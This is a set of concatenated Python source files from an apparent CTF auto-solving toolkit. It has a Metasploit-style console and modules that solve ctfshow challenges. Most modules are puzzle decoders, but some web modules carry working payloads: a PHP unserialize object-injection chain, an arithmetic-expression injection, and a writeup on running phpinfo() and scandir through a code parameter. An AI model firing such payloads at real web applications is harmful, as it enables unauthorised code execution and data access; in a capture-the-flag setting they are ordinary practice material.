 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"zipper,clipper,not...",
"platform":"ctfshow",
"contest" : "cjb(chi ji bei)",
"description":"cjb misc.",
"requirements":"python base58,zipfile.",
"module options":[
	{"name":"filename","required":True,"description":"the full path (or relative path) of zip file."},
	]
}
	return(info)

def exploit(options):
	filepath=options["filename"]
	import base58, zipfile
	z = zipfile.ZipFile(filepath)
	t = [''] * 1000
	for i in z.namelist():
		tmp = i.split('/')
		if tmp[-1] != '':
			t[int(tmp[-1])] = tmp[-2]
	t = base58.b58decode(''.join(t).encode()).decode()
	print('ctfshow{' + t.split('{')[1].split('}')[0] + '}')
	return ("做完了，套神称之为烂题。")

def make_wp():
	wp=f"""
根据积累和特征，得到flag。
	"""
	return(wp)


import inspect
from typing import Callable, Dict, Iterable, List, Sequence

from .exceptions import CommandError
from .guides import extract_guides


class Command:
    def __init__(
        self,
        name: str,
        func: Callable,
        description: str,
        guides: Dict[str, Iterable[Callable]] = None,
    ):
        self.name = name
        self.description = description

        self._func = func
        self._completer_function = None

        self._guides = extract_guides(self._func)
        self._guides.update(guides if guides else {})
        self._validate_guides()

    def _validate_guides(self) -> None:
        """Validate guides setup.

        Check if guides setup is valid and raise exception with
        informative message what is wrong.

        """
        for parameter, command_guides in self._guides.items():
            if not isinstance(command_guides, Iterable):
                raise CommandError(
                    f"Command '{self.name}': guides for parameter "
                    f"'{parameter}' have to be iterable "
                    f"not '{type(command_guides)}'"
                )

            for guide in command_guides:
                if not isinstance(guide, Callable):
                    raise CommandError(
                        f"Command '{self.name}': guide for "
                        f"parameter '{parameter}' have to be "
                        f"callable not {type(guide)}"
                    )

    def _process_arguments(self, name: str, *args) -> List:
        """Process each argument according to selected chain of guides

        Process each argument according to selected chain of guides. Each
        guide from the collection is applied to the every argument.
        Guide as input uses output from previous guide e.g.

            guide_3(guide_2(guide_1("scoo")))

        """
        processed = []
        for arg in args:
            for guide in self._guides.get(name, []):
                arg = guide(arg)
            processed.append(arg)

        return processed

    def _apply_guides(self, bound_arguments: inspect.BoundArguments) -> List:
        """Apply guide functions.

        Apply guide functions to values of type `str` delivered by user
        using `input()`.

        Assumes that `args` have been already validated `_bind_arguments`,
        hence `args` is matching `_func` signature, (`args <= parameters`)

        """
        processed = []
        for name, value in bound_arguments.arguments.items():
            if (
                bound_arguments.signature.parameters[name].kind
                is inspect.Parameter.VAR_POSITIONAL
            ):
                arguments = self._process_arguments(name, *value)
            else:
                arguments = self._process_arguments(name, value)

            processed.extend(arguments)

        return processed

    def _bind_arguments(self, *args) -> inspect.BoundArguments:
        """ Check whether given `args` match `_func` signature. """
        try:
            return inspect.signature(self._func).bind(*args)
        except TypeError as e:
            raise CommandError(e)

    def execute(self, *args: str) -> None:
        """Execute handling function (`self._func`) bound to command.

        In case of argument mismatch during function call we want to give
        user informative feedback that's why we are wrapping
        `TypeError` with `CommandError`.

        """
        return self._func(*self._apply_guides(self._bind_arguments(*args)))

    def complete(self, *args, **kwargs) -> Sequence:
        """ Execute completer function bound to this command. """

        if not self._completer_function:
            return ()

        return self._completer_function(*args, **kwargs)

    def attach_completer(self, completer_function: Callable) -> None:
        """Attach complater function.

        # TODO: Maybe we should make it @property?
        """
        if self._completer_function:
            raise CommandError(
                f"Command '{self.name}' already has completer function."
            )
        self._completer_function = completer_function

    def __str__(self):
        return self.name

    def __eq__(self, other):
        return all((self.name == other.name, self._func is other._func))



import sys
import typing

from .thread import PrintResource


class PrinterBaseMixin:
    def _print(
        self,
        *args,
        sep: typing.Optional[str] = " ",
        end: typing.Optional[str] = "\n",
        file: typing.Optional[typing.IO] = sys.stdout,
    ):
        self._printer_thread.put(
            PrintResource(content=args, sep=sep, end=end, file=file)
        )


class PrinterMixin(PrinterBaseMixin):
    def print(self, *args, **kwargs):
        self._print(*args, **kwargs)

    def info(self, *args, **kwargs):
        self.print(*args, **kwargs)

    def error(self, *args, **kwargs):
        self._print("\033[91m[-]\033[0m", *args, **kwargs)

    def status(self, *args, **kwargs):
        self._print("\033[94m[*]\033[0m", *args, **kwargs)

    def success(self, *args, **kwargs):
        self._print("\033[92m[+]\033[0m", *args, **kwargs)



#author 8神 Cheyenne
#感谢8神提供脚本，救了命了
from PIL import Image
import math

# 把字节对应转换成二进制字符串
def Byte2Bin(byte, order):
    s = ''
    for i in range(len(byte)):
        if order == 'lsb':
            tmp = str(bin(byte[i]))[2:].zfill(8)
        elif order == 'msb':
            tmp = str(bin(byte[i]))[2:].zfill(8)[::-1]
        else:
            raise(NameError)
        s += tmp
    return(s)

# 把8位二进制数的第n位（从低往高数）替换成0或1
def NumReplace(number, n, x01):
    if number > 255 or number < 0 or n > 7 or n < 0 or x01 not in [0, 1]:
        raise(NameError)
    tmp = str(bin(number))[2:].zfill(8)
    n = 7 - n
    s = tmp[:n] + str(x01) + tmp[n+1:]
    return(int(s, 2))


def LSB(path, ori, out, payload, bit = '0', plane = 'RGB', axis = 'x', order = 'lsb'):
    img = Image.open(path + ori)
    w, h, m = img.size[0], img.size[1], img.mode
    binstr = Byte2Bin(payload, order)

    # 把plane参数转换成对应通道的顺序的列表
    plist = []
    for i in plane:
        if m.find(i) == -1:
            raise(IndexError)
        else:
            plist += [m.find(i)]

    # 把bit参数转换成对应字节位的列表
    blist = []
    for i in bit:
        blist += [int(i)]

    # 计算需要的像素数量（不判断图片像素够不够用）
    pixelnum = math.ceil(len(binstr) / (len(plist) * len(bit)))

    # 开始隐写
    for a in range(pixelnum):
        if axis == 'x':
            px, py = a % w, a // w
        elif axis == 'y':
            py, px = a % h, a // h
        else:
            raise(NameError)
        pixel = list(img.getpixel((px, py)))
        for b in range(len(plist)):
            for c in range(len(bit)):
                binstrnum = a * len(plist) * len(bit) + b * len(bit) + c
                if binstrnum < len(binstr):
                    pixel[plist[b]] = NumReplace(pixel[plist[b]], blist[c], int(binstr[binstrnum]))
        img.putpixel((px, py), tuple(pixel))

    img.save(path + out)


 # -*- coding: utf-8 -*-
import os,importlib,random


version="0.0.1"
modules_info={}
Exploit_Details={}

def get_modules_info():
    base_dir=os.path.dirname(os.path.realpath(__file__))
    global modules_info
    count_all=0
    module_types=os.listdir(base_dir+os.sep+'modules')
    module_types=list(set(module_types)-set(["__init__.py","__pycache__"]))
    for module_type in module_types:
        modules_list=[i for i in os.listdir(base_dir+os.sep+'modules'+os.sep+module_type) if i[-3:]==".py" and i!="__init__.py"]
        count_all+=len(modules_list)
        modules_info[module_type]={}
        for module_name in modules_list:
            module_name=module_name.replace(".py",'')
            try:
                t=importlib.import_module("mumuzi.modules."+module_type+'.'+module_name)
            except:
                t=importlib.import_module("modules."+module_type+'.'+module_name)
            modules_info[module_type][module_name]=t.info()

    return modules_info,count_all




def get_banner():
    global version
    modules_info,count_all=get_modules_info()
    BANNER = f"""
 
 \033[0;"""+random.choice(['31','32','33','34','35','36'])+"""m██╗  ██╗██╗   ██╗ █████╗ ███╗   ██╗
 ╚██╗██╔╝██║   ██║██╔══██╗████╗  ██║
  ╚███╔╝ ██║   ██║███████║██╔██╗ ██║
  ██╔██╗ ██║   ██║██╔══██║██║╚██╗██║
 ██╔╝ ██╗╚██████╔╝██║  ██║██║ ╚████║
 ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝\033[0m
                                   
e\033[0;32mX\033[0mtremely \033[0;32mU\033[0mltimate \033[0;31mAnal\33[0mysistical \033[0;32mN\033[0meuron


Disclaimer : Usage of XUAN for attacking targets without prior mutual consent is illegal.
Dev Team   : Neuron-Network on Mumuzi
Version    : """+version+"""

Exploits   : """+str(count_all)+'\n'

    for module_type in modules_info.keys():
        BANNER+="    "+module_type.ljust(5)+" : "+str(len(modules_info[module_type]))+'\n'
    BANNER+="""
*type "help" to get some help.
"""
    return(BANNER)




def command_help(command):
    if command is None:
        return """
Core Commands
=============

    Command       Description
    -------       -----------
    help          Help menu
    exit          Exit the console
    set           Sets a context-specific variable to a value

Module Commands
===============

    Command       Description
    -------       -----------
    info          Displays information about one or current module
    options       Displays options for one or current module
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index
    run/exploit   Run one or current module
    tao           Taoshen writes a writeup for you (but you maybe cannot understand it)

Examples
========

Xuan:~ > use web/test_for_web
Xuan:web/test_for_web > set url='http://127.0.0.1'
Xuan:web/test_for_web > run

"""

def get_module_fullpath_and_infodata(module_path):
    module_path=module_path.lstrip('/').lstrip('\\')
    if '/' in module_path :
        module=module_path.split('/')
        info_data=modules_info[module[0]][module[1]]
        module_full_path='/'.join(module)
    elif '\\' in module_path:
        module=module_path.split('\\')
        info_data=modules_info[module[0]][module[1]]
        module_full_path='/'.join(module)
    else:
        for module_type in modules_info.keys():
            if module_path in modules_info[module_type].keys():
                info_data=modules_info[module_type][module_path]
                module_full_path=module_type+'/'+module_path
    try:
        return(True,(module_full_path,info_data))
    except:
        return(False,"module name error")



def get_module_info(module_path,Exploit_Details):
    success,result=get_module_fullpath_and_infodata(module_path)
    if success:
        (module_full_path,info_data)=result
    else:
        return(False,"key error")
    s="\n\nModule Path:\n"+'='*20+'\n'
    s+=module_full_path+'\n\n'
    s+="Module Info:\n"+'='*20+'\n'
    for key in info_data.keys():
        if key!="module options":
            s+=key.ljust(6)+" : "+info_data[key]+'\n'
    s+='\n'
    s+="Module options:\n"+'='*20+'\n'
    s+="Name        Current Setting                                   Required  Description\n"
    s+="------      ------------------------------------------------  --------  -----------\n"
    for module_option_line in info_data['module options']:
        s+=module_option_line['name'].ljust(12)
        if module_option_line['name'] in Exploit_Details:
            if len(Exploit_Details[module_option_line['name']])>=48:
                s+=(Exploit_Details[module_option_line['name']][:45]+"...").ljust(50)
            else:
                s+=Exploit_Details[module_option_line['name']].ljust(50)
        else:
            s+=" "*50
        if module_option_line['required']:
            s+='\033[0;32m'+str(module_option_line['required']).ljust(10)+'\033[0m'
        else:
            s+='\033[0;31m'+str(module_option_line['required']).ljust(10)+'\033[0m'
        s+=module_option_line['description']+'\n'
    return(True,s)

def run_module(module_path,Exploit_Details):
    #check is Exploit_Details right
    success,result=get_module_fullpath_and_infodata(module_path)
    if success:
        (module_full_path,info_data)=result
    else:
        return(False,"module name error")
    for option in info_data["module options"]:
        if option["required"] and option["name"] not in Exploit_Details.keys():
            return (False,"Option:"+option["name"]+" not set!")
    try:
        m=importlib.import_module("mumuzi.modules."+module_full_path.replace('/','.'))
    except:
        m=importlib.import_module("modules."+module_full_path.replace('/','.'))
    result=m.exploit(Exploit_Details)
    return(True,result)

def fetch(full_string, query_string):
    return(full_string.replace(query_string, '\033[0;31m%s\033[0m' % query_string))

def search_from_all_modules(query_string):
    result=''
    for module_type in modules_info.keys():
        for module_path in modules_info[module_type]:
            result_tmp=(module_type+'/'+module_path).ljust(34)+modules_info[module_type][module_path]['questname'].ljust(26)+modules_info[module_type][module_path]['platform'].ljust(22)+modules_info[module_type][module_path]['contest']+'\n'
            if query_string in result_tmp:
                result+=fetch(result_tmp,query_string)
    if len(result)==0:
        return(False,"No matches for \""+query_string+"\"!")
    s='\n\nSearch Result:\n'+'='*20+'\n'
    s+='Path                              Name                      Platform              Contest\n'
    s+='============================      ======================    ==================    =================\n'
    s+=result
    return(True,s)




def show_all_modules(module_type):
    if module_type is not None and module_type not in modules_info.keys():
        return(False,"No modules for \""+module_type+"\"!")
    result=''
    if module_type is None:
        for module_type in modules_info.keys():
            for module_path in modules_info[module_type]:
                result+=(module_type+'/'+module_path).ljust(34)+modules_info[module_type][module_path]['questname'].ljust(26)+modules_info[module_type][module_path]['platform'].ljust(22)+modules_info[module_type][module_path]['contest']+'\n'
    else:
        for module_path in modules_info[module_type]:
            result+=(module_type+'/'+module_path).ljust(34)+modules_info[module_type][module_path]['questname'].ljust(26)+modules_info[module_type][module_path]['platform'].ljust(22)+modules_info[module_type][module_path]['contest']+'\n'

    s='\n\nModules Info:\n'+'='*20+'\n'
    s+='Path                              Name                      Platform              Contest\n'
    s+='============================      ======================    ==================    =================\n'
    s+=result
    return(True,s)

def make_wp(module_path):
    success,result=get_module_fullpath_and_infodata(module_path)
    if success:
        (module_full_path,info_data)=result
    else:
        return(False,"module name error")
    try:
        m=importlib.import_module("mumuzi.modules."+module_full_path.replace('/','.'))
    except:
        m=importlib.import_module("modules."+module_full_path.replace('/','.'))
    result=m.make_wp()
    return(True,result)


 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"Quest Of Image",
"platform":"ctfshow",
"contest" : "jwb(juan wang bei)",
"description":"jwb misc.",
"requirements":"python qoi,PIL.",
"module options":[
	{"name":"filename","required":True,"description":"the full path (or relative path) of png file."},
	]
}
	return(info)

def exploit(options):
	filepath=options["filename"]
	import qoi, os
	from PIL import Image
	f = open(filepath, 'rb').read()
	key = (0x89504e47 ^ 0x716f6966).to_bytes(4, 'big')
	file = b''.join([(f[i] ^ key[i % 4]).to_bytes(1, 'big') for i in range(len(f))])
	file = file[:8] + int(350).to_bytes(4, 'big') + file[12:]
	open('./1.tmp', 'wb').write(file)
	img = Image.fromarray(qoi.read('./1.tmp')).crop((0, 300, 900, 350))
	os.remove('./1.tmp')
	img.save('flag.png')
	return("your flag is in flag.png!!!")


def make_wp():
	wp=f"""
略。
	"""
	return(wp)


from enum import Enum
from colorama import init
init(autoreset=True)

class Palette(Enum):
    GREY = 30
    RED = 31
    GREEN = 32
    YELLOW = 33
    BLUE = 34
    MAGENTA = 35
    CYAN = 36
    WHITE = 37

    BOLD = 1

    def format(self, obj: str):
        return f"\033[{self.value}m{obj}\033[0m"



 # -*- coding: utf-8 -*-
from pwn import *
	
ALL_NUMBERS = [str(number).zfill(4) for number in range(10000)]
START=['7426', '1375', '9825', '1206']

def info():
	info={
"questname":"QGame_Pro_revenge",
"platform":"ctfshow",
"contest" : "jwb(juan wang bei)",
"description":"jwb misc.",
"requirements":"python pwntools.",
"module options":[
	{"name":"port","required":True,"description":"the port of pwn.challenge.ctf.show."},
	]
}
	return(info)

def is_fit(number_str,guess_str,xAxB):
	"""
	用于分析当前列表中的一个数字与上一个猜测的数字是否符合xAxB的格式
	"""
	_A=0
	_B=0
	_ban1 =[0,1,2,3]
	_ban2 = [0,1,2,3]
	for i in range(4):
		if(guess_str[i] == number_str[i]):
			_A += 1
			_ban1.remove(i)
			_ban2.remove(i)
	for i in _ban1:
		for j in _ban2:
			if(guess_str[i] == number_str[j]):
				_B += 1
				_ban2.remove(j)
				break
	return (f'{_A}A{_B}B'==xAxB)


def trim_numbers(current_list,guess_str,xAxB):
	"""
	用于根据当前可能列表和上次猜测的字符串及结果生成可能的字符串列表
	"""
	_tmp_list=[]
	for number_str in current_list:
		if is_fit(number_str,guess_str,xAxB):
			_tmp_list.append(number_str)
	return(_tmp_list)


def solve(port):
	sh=remote("pwn.challenge.ctf.show",port)
	r=sh.recvline().decode()
	r=sh.recvline().decode()	
	while True:
		r=sh.recvline().decode()
		if "flag" in r:
			print(r,end="")
			r=sh.recvall().decode()
			return(r)
		print(r,end="")
		_current_list=ALL_NUMBERS[:]
		for _round in range(9):
			if _round<len(START):
				sh.sendline(START[_round])
				_last_try=START[_round]
			else:
				sh.sendline(_next_for_try)
				_last_try=_next_for_try
			r=sh.recvline().decode()
			if "perfect" in r:
				break
			xAxB=r.split(' ')[0]
			_current_list=trim_numbers(_current_list,_last_try,xAxB)
			_next_for_try=_current_list[0]



def exploit(options):
	port=options["port"]
	while True:
		try:
			flag=solve(port)
			print(flag)
			return("本题算做签到题谁敢有意见！！！！")
		except:
			print("Once More!!!!!")
			print("*"*100)


def make_wp():
	wp=f"""
这是一个抑智小游戏，叫“Bulls and Cows”,规则可以从百度百科里找，解法也可以。

这里提供的解法是先生成0000-9999的数字列表，然后进行固定尝试，根据尝试得到的结果对列表进行删减，并从列表中查找相关元素。

但是套神母体提供的算法有点谜，我也不知道写对了没有，达不到100%的成功率，但是总算也能做得出来，懒得调试了，都说是简单签到题了你还想怎样。
	"""
	return(wp)






import ast
from typing import Any, AnyStr, Callable, Dict, Text, Tuple

from .exceptions import GuideError


def literal(value: str) -> Any:
    try:
        return ast.literal_eval(value)
    except Exception:
        raise GuideError(value, literal)


def encode(value: str) -> Any:
    try:
        return value.encode()
    except Exception:
        raise GuideError(value, encode)


def get_guides(annotation) -> Tuple[Callable]:
    """ Based on given annotation get chain of guides. """

    if annotation in (str, AnyStr, Text):
        return ()
    elif annotation is bytes:
        return (encode,)
    else:
        return (literal,)


def extract_guides(func: Callable) -> Dict[str, Tuple[Callable]]:
    """ Extract guides out of type-annotations. """
    return {
        arg: get_guides(annotation)
        for arg, annotation in func.__annotations__.items()
    }



 # -*- coding: utf-8 -*-

from .riposte import Riposte
from .riposte.printer import Palette
from .xuan_func import *
from colorama import init
init(autoreset=True)

class Application:
    def __init__(self):
        self.module = "~"


class CustomRiposte(Riposte):
    @property
    def prompt(self):
        if app.module:
            return f"\033[0;32mXuan:{app.module} > \033[0m"
        else:
            return self._prompt  # reference to `prompt` parameter.

app = Application()
XUAN = CustomRiposte(banner=get_banner(),prompt="\033[0;32mXuan:~ > \033[0m")
Exploit_Details={}

@XUAN.command("help")
def xuan_help(command=None):
    XUAN.print(command_help(command))

@XUAN.command("exit")
def xuan_exit():
    XUAN.print("bye!")
    exit()

@XUAN.command("set")
def xuan_set(msg):
    if msg.count('=')==1:
        Exploit_Details[msg.split('=')[0]]=msg.split('=')[1]
        XUAN.success(msg)
    else:
        XUAN.error('set error!')

@XUAN.command("info")
def xuan_info(module_path=None):
    if module_path is None:
        if app.module=="~":
            XUAN.error('no module name!!')
            return
        else:
            module_path=app.module
    success,msg=get_module_info(module_path,Exploit_Details)
    if success:
        XUAN.print(msg)
    else:
        XUAN.error(msg)

@XUAN.command("options")
def xuan_options(module_path=None):
    if module_path is None:
        if app.module=="~":
            XUAN.error('no module name!!')
            return
        else:
            module_path=app.module
    success,msg=get_module_info(module_path,Exploit_Details)
    if success:
        XUAN.print("\nModule options:"+msg.split("Module options:")[-1])
    else:
        XUAN.error(msg)

@XUAN.command("use")
def xuan_use(module_path):
    success,result=get_module_fullpath_and_infodata(module_path)
    if success:
        app.module=result[0]
        XUAN.success('Module has been set.')
    else:
        XUAN.error('Module name error!')

@XUAN.command("run")
@XUAN.command("exploit")
def xuan_run(module_path=None):
    if module_path is None:
        if app.module=="~":
            XUAN.error('no module name!!')
            return
        else:
            module_path=app.module
    XUAN.success('running exploit......')
    success,msg=run_module(module_path,Exploit_Details)
    if success:
        XUAN.success("exploit completed.....")
        XUAN.success(msg)
    else:
        XUAN.error(msg)
    
@XUAN.command("search")
def xuan_search(querystring: str):
    success,msg=search_from_all_modules(querystring)
    if success:
        XUAN.print(msg)
    else:
        XUAN.error(msg)

@XUAN.command("show")
def xuan_show(module_type=None):
    success,msg=show_all_modules(module_type)
    if success:
        XUAN.print(msg)
    else:
        XUAN.error(msg)

@XUAN.command("tao")
def xuan_tao(module_path=None):
    if module_path is None:
        if app.module=="~":
            XUAN.error('no module name!!')
            return
        else:
            module_path=app.module
    XUAN.success('making writeup......')
    success,msg=make_wp(module_path)
    if success:
        with open('wp.md','wb')as f:
            f.write(msg.encode('utf-8'))
        XUAN.success("your writeup is in wp.md")
    else:
        XUAN.error(msg)

XUAN.run()







 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"easy unserialize",
"platform":"ctfshow",
"contest" : "jwb(juan wang bei)",
"description":"ctfshow jwb web easy unserialize.",
"requirements":"python requests",
"module options":[
	{"name":"url","required":True,"description":"full url."},
	]
}
	return(info)

def exploit(options):
	url=options['url']
	import requests
	if url[:7]!="http://" :
		url='http://'+url
	payload="?ctfshow=O%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00filename%22%3BO%3A3%3A%22one%22%3A1%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BN%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7D%7D%7D"
	r=requests.get(url+payload)
	print(r.content.decode())
	return("套神做完了，并觉得过于简单")


def make_wp():
	wp="""
自己看官方wp
"""
	return(wp)
	


 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"webqiandao",
"platform":"ctfshow",
"contest" : "blb(bai lan bei)",
"description":"ctfshow blb web qian dao.",
"requirements":"python requests",
"module options":[
	{"name":"url","required":True,"description":"full url."},
	]
}
	return(info)

def exploit(options):
	url=options['url']
	import requests
	if url[:7]!="http://" :
		url='http://'+url
	payload={"A":"114)+(0","B":"1","C":"-1"}
	r=requests.post(url,data=payload)
	print(r.content.decode())
	return("套神做完了，并告诉你这是一个烂题")


def make_wp():
	wp="""
根据题目可知，要输入三非0数字，使得结果为114，简单尝试一下就知道这几乎是不可能的，那么只能从程序逻辑上看有没有漏洞可钻了。

输入数字可以发现计算公式，输入其他字符会提示hacker，输入+-*（）和数字则不会提示非法，而是会把算式列出来，或者算式没法算就直接摆烂。
所以很简单的就可以想到，闭合括号运算，让算式的值为114就可以了。

payload（参考）：

A=114)+(0&B=1&C=-1
"""
	return(wp)
	


 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"web680",
"platform":"ctfshow",
"contest" : "none",
"description":"ctfshow webrumen dasaiyuanti web680.",
"requirements":"python requests",
"module options":[
	{"name":"url","required":True,"description":"full url."},
	]
}
	return(info)

def exploit(options):
	url=options['url']
	import requests
	if url[:7]!="http://" :
		url='http://'+url
	flag=requests.get(url.rstrip('/')+'/secret_you_never_know').text
	return(flag)


def make_wp():
	wp="""
post一个code=phpinfo();

获取到了phpinfo,可以看到设置了open_basedir和disabled_functions。

直接var_dump(scandir('.'));获取到了当前目录文件名，找到了"secret_you_never_know"这个文件，下载获得flag
"""
	return(wp)


import itertools
from pathlib import Path
from typing import Callable, Generator

from .exceptions import StopRiposteException


def prompt_input(prompt: Callable) -> Generator[Callable, None, None]:
    """ Unexhaustible generator yielding `input` function forever. """
    yield from itertools.repeat(lambda: input(prompt()))


def cli_input(inline_commands: str) -> Generator[Callable, None, None]:
    """ Translate inline command provided via '-c' into input stream. """
    yield lambda: inline_commands


def file_input(path: Path) -> Generator[Callable, None, None]:
    """ Read file and translate it into input stream """
    try:
        with open(path, "r") as file_handler:
            for line in file_handler:
                yield lambda: line
    except Exception:
        raise StopRiposteException(f"Problem with reading the file: {path}")



from typing import Callable

from .printer import Palette


class RiposteException(Exception):
    pass


class StopRiposteException(Exception):
    pass


class CommandError(RiposteException):
    pass


class GuideError(RiposteException):
    def __init__(self, value: str, guide: Callable):
        self.value = value
        self.guide = guide

    def __str__(self):
        return (
            f"GuideError: Can't apply "
            f"{Palette.BOLD.format(self.guide.__name__)} guide "
            f"to value {Palette.BOLD.format(self.value)}"
        )



import argparse
import atexit
from pathlib import Path
import readline
import shlex
from typing import Callable, Dict, Iterable, List, Optional, Sequence

from . import input_streams
from .command import Command
from .exceptions import CommandError, RiposteException, StopRiposteException
from .printer.mixins import PrinterMixin
from .printer.thread import PrinterThread
from colorama import init
init(autoreset=True)

def is_libedit():
    return False
    return "libedit" in readline.__doc__


class Riposte(PrinterMixin):
    def __init__(
        self,
        prompt: str = "riposte:~ $ ",
        banner: Optional[str] = None,
        history_file: Path = Path.home() / ".riposte",
        history_length: int = 100,
    ):
        self.banner = banner
        self.print_banner = True
        self.parser = None
        self.arguments = None
        self.input_stream = input_streams.prompt_input(lambda: self.prompt)

        self._prompt = prompt
        self._commands: Dict[str, Command] = {}

        self.setup_cli()

        self._printer_thread = PrinterThread()
        self._setup_history(history_file, history_length)
        self._setup_completer()

    @staticmethod
    def _setup_history(history_file: Path, history_length: int) -> None:
        if not history_file.exists():
            with open(history_file, "a+") as history:
                if is_libedit():
                    history.write("_HiStOrY_V2_\n\n")

        readline.read_history_file(str(history_file))
        readline.set_history_length(history_length)
        atexit.register(readline.write_history_file, str(history_file))

    def _setup_completer(self) -> None:
        readline.set_completer(self._complete)
        readline.set_completer_delims(" \t\n;")
        readline.parse_and_bind(
            "bind ^I rl_complete" if is_libedit() else "tab: complete"
        )

    def _complete(self, text: str, state: int) -> Optional[Sequence[str]]:
        """Return the next possible completion for `text`.

        If a command has not been entered, then complete against command list.
        Otherwise try to call specific command completer function to get list
        of completions.
        """
        if state == 0:
            original_line = readline.get_line_buffer()
            line = original_line.lstrip()
            stripped = len(original_line) - len(line)
            start_index = readline.get_begidx() - stripped
            end_index = readline.get_endidx() - stripped

            if start_index > 0 and line:
                cmd, *_ = self._parse_line(line)
                try:
                    complete_function = self._get_command(cmd).complete
                except CommandError:
                    return
            else:
                complete_function = self._raw_command_completer

            self.completion_matches = complete_function(
                text, line, start_index, end_index
            )

        try:
            return self.completion_matches[state]
        except IndexError:
            return

    def contextual_complete(self) -> List[str]:
        """Entry point for contextual tab completion.

        Entry point for contextual tab completion depending on `Riposte` app
        state. Overwrite this method to suggest suitable commands.
        """
        return list(self._commands.keys())

    def _raw_command_completer(
        self, text, line, start_index, end_index
    ) -> List[str]:
        """ Complete command w/o any argument """
        return [
            command
            for command in self.contextual_complete()
            if command.startswith(text)
        ]

    @staticmethod
    def _split_inline_commands(line: str) -> List[str]:
        """ Split multiple inline commands. """
        parsed = shlex.split(line, posix=False)

        commands = []
        command = []
        for element in parsed:
            if element[-2:] == "\\;":
                command.append(element)
            elif element[-2:] == ";;":
                raise CommandError("unexpected token: ;;")
            elif element[-1] == ";" and element[:-1] != "":
                command.append(element[:-1])
                commands.append(command)
                command = []
            elif element[-1] == ";" and element[:-1] == "":
                commands.append(command)
                command = []
            else:
                command.append(element)

        if command:
            commands.append(command)

        return [" ".join(command) for command in commands if command]

    @staticmethod
    def _parse_line(line: str) -> List[str]:
        """ Split input line into command's name and its arguments. """
        try:
            return shlex.split(line)
        except ValueError as err:
            raise RiposteException(err)

    def _get_command(self, command_name: str) -> Command:
        """ Resolve command name into registered `Command` object. """
        try:
            return self._commands[command_name]
        except KeyError:
            raise CommandError(f"Unknown command: {command_name}")

    def setup_cli(self):
        """Initialize CLI

        Overwrite this method in case of adding custom arguments.
        """
        self.parser = argparse.ArgumentParser()
        self.parser.add_argument("file", nargs="?", default=None)
        self.parser.add_argument(
            "-c",
            metavar="commands",
            help="commands passed in as string, delimited with semicolon",
        )

    def parse_cli_arguments(self) -> None:
        """Parse passed CLI arguments

        Overwrite this method in order to parse custom CLI arguments.
        """
        self.arguments = self.parser.parse_args()
        if self.arguments.c:
            self.print_banner = False
            self.input_stream = input_streams.cli_input(self.arguments.c)
        elif self.arguments.file:
            self.print_banner = False
            self.input_stream = input_streams.file_input(
                Path(self.arguments.file)
            )

    @property
    def prompt(self):
        """Entrypoint for customizing prompt

        Please overwrite this method to provide contextual prompt depending on
        different state of `Riposte` app.
        """
        return self._prompt

    def command(
        self,
        name: str,
        description: str = "",
        guides: Dict[str, Iterable[Callable]] = None,
    ) -> Callable:
        """ Decorator for bounding command with handling function. """

        def wrapper(func: Callable):
            if name not in self._commands:
                self._commands[name] = Command(name, func, description, guides)
            else:
                raise RiposteException(f"'{name}' command already exists.")
            return func

        return wrapper

    def complete(self, command: str) -> Callable:
        """ Decorator for bounding complete function with `Command`. """

        def wrapper(func: Callable):
            cmd = self._get_command(command)
            cmd.attach_completer(func)
            return func

        return wrapper

    def _process(self) -> None:
        """Process input provided by the input stream.

        Get provided input, parse it, pick appropriate handling
        function and execute it.
        """
        user_input = next(self.input_stream)()
        if not user_input:
            return

        for line in self._split_inline_commands(user_input):
            command_name, *args = self._parse_line(line)
            self._get_command(command_name).execute(*args)

    def run(self) -> None:
        self._printer_thread.start()

        self.parse_cli_arguments()

        if self.banner and self.print_banner:
            # builtin print() to avoid race condition with input()
            print(self.banner)

        while True:
            try:
                self._process()
            except RiposteException as err:
                self.error(err)
            except StopRiposteException as err:
                self.error(err)
                break
            except EOFError:
                self.print()
                break
            except StopIteration:
                break
            except KeyboardInterrupt:
                self.print()
            finally:
                self._printer_thread.wait()



 # -*- coding: utf-8 -*-
def info():
	info={
"questname":"Brainfix",
"platform":"ctfshow",
"contest" : "yrb22",
"description":"muscrepwebto",
"requirements":".",
"module options":[
	{"name":"cipher","required":True,"description":"the path of the text file."},
	]
}
	return(info)

def exploit(options):
	import re, itertools
	c = open(options["cipher"], 'r').read().strip()
	for i in itertools.permutations('><+-.,[]'):
		p = c.translate(str.maketrans(''.join(i), '01234567'))
		p = ''.join([chr(int(p[i: i + 3], 8)) for i in range(0, len(p), 3)])
		flag = re.search(r'ctfshow\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}', p)
		if flag:
			return (f"{flag.group()}\n    做完了，套神称之为烂题。")

def make_wp():
	wp=f"""
根据积累和特征，得到flag。
	"""
	return(wp)


import setuptools

with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="mumuzi",
    version="1.2.3",
    author="Neuron-Network on Mumuzi",
    author_email="mumuzi@mumuzi.mumuzi",
    description="ctf全栈全自动解题姬mumuzi",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://blog.csdn.net/qq_42880719/",
    project_urls={
        "Bug Tracker": "https://blog.csdn.net/qq_42880719/",
    },
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    package_dir={"": "mumuzi"},
